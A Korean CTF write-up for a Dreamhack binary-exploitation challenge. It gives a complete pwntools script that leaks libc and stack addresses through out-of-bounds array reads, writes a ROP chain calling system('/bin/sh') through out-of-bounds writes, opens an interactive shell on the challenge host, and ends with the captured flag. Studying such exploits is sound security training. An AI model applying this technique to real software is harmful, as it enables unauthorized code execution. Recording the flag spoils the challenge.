풀이

  • OOB(배열 범위 밖 인덱스) 읽기로 libc 주소와 스택 주소를 leak하고, OOB 쓰기로 ROP 체인(pop rdi; ret → "/bin/sh" → system)을 구성하면 된다.
  • 출력은 puts, 입력은 strcpy로 처리되므로 둘 다 첫 널 바이트에서 끊긴다. leak한 포인터는 상위 2바이트가 0이라 6바이트만 읽어 오고, 쓰는 값에 널 바이트가 섞이면 그 뒤는 복사되지 않으니 주의해야 한다.
from pwn import *

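context.log_level = "debug"

# --- target-specific constants ---------------------------------------------
# Every offset below is tied to the bundled ./libc.so.6; recompute them if the
# challenge ships a different libc build.
LIBC_LEAK_INDEX = -0x1E8 // 8  # = -61: slot whose OOB read returns a libc pointer
LIBC_LEAK_OFFSET = 0x203AC0  # distance of that leaked pointer from the libc base
STACK_LEAK_INDEX = -5  # slot whose OOB read returns a stack pointer
POP_RDI_RET = 0x000000000010F75B  # pop rdi; ret  (5f c3) in libc
RET = POP_RDI_RET + 1  # bare `ret`: skips the pop, used to keep rsp 16-byte aligned before system()

# --- connection --------------------------------------------------------------
# Default is the remote service; run with `python3 exploit.py LOCAL` to use a
# local copy of the binary with the bundled libc preloaded instead.
if args.LOCAL:
    io = process("./chall", env={"LD_PRELOAD": "./libc.so.6"})
else:
    io = remote("host8.dreamhack.games", 18381)
libc = ELF("./libc.so.6", checksec=False)


def read_slot(index: int) -> int:
    """Menu 1: print slot `index` and return the leaked pointer as an int.

    The binary prints with puts, so output stops at the first null byte. A
    canonical x86-64 user pointer has its two top bytes zero, hence exactly
    6 bytes are read and zero-extended to 8.
    """
    io.sendlineafter(b">> ", b"1")
    io.sendlineafter(b": ", str(index).encode())
    return u64(io.recvn(6).ljust(8, b"\x00"))


def write_slot(index: int, data: bytes) -> None:
    """Menu 2: write `data` into slot `index` (the index is not range-checked).

    Input goes through strcpy, so `data` must not rely on bytes after an
    embedded null being copied.
    """
    io.sendlineafter(b">> ", b"2")
    io.sendlineafter(b": ", str(index).encode())
    io.send(data)


# --- leaks -------------------------------------------------------------------
libc_base = read_slot(LIBC_LEAK_INDEX) - LIBC_LEAK_OFFSET
# If the leaked pointer contains a null in its low 6 bytes, puts truncates it
# and recvn(6) swallows part of the next prompt: the "base" is then garbage and
# every later write would be misplaced. Fail loudly instead of pressing on.
if libc_base & 0xFFF:
    io.close()
    raise RuntimeError(
        f"libc leak not page-aligned ({libc_base:#x}); null byte in pointer? rerun"
    )
libc.address = libc_base
log.info(f"libc base: {hex(libc_base)}")

stack = read_slot(STACK_LEAK_INDEX)
# Same truncation risk; x86-64 Linux user stacks normally sit at 0x7f.., so
# anything else is suspicious (warning only — not a hard guarantee).
if stack >> 40 != 0x7F:
    log.warning(f"stack leak {stack:#x} does not look like a stack address; null byte in pointer?")
log.info(f"stack: {hex(stack)}")


# --- ROP chain ---------------------------------------------------------------
# Slots 9-12 are primed with stack-relative addresses before the chain is
# written. NOTE(review): the binary is not in view — presumably the later
# writes to slots 19-22 are routed through these entries; confirm against the
# disassembly before changing the offsets.
primer = b"".join(
    [
        p64(0) * 8,
        p64(stack - 0x98),
        p64(stack - 0x90),
        p64(stack - 0x88),
        p64(stack - 0x80),
    ]
)
write_slot(1, primer)

# system("/bin/sh"): ret (alignment) -> pop rdi; ret -> "/bin/sh" -> system.
# libc.address is already rebased, so search() and sym[] yield runtime addresses.
chain = [
    (19, RET + libc_base),
    (20, POP_RDI_RET + libc_base),
    (21, next(libc.search(b"/bin/sh\x00"))),
    (22, libc.sym["system"]),
]
for slot, value in chain:
    write_slot(slot, p64(value))

# Menu 3 presumably leaves the vulnerable function, which kicks off the chain.
io.sendlineafter(b">> ", b"3")

io.interactive()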

# DH{63e68ef229895726:kO4Wzdum/dYdQIwADV0iwQ==}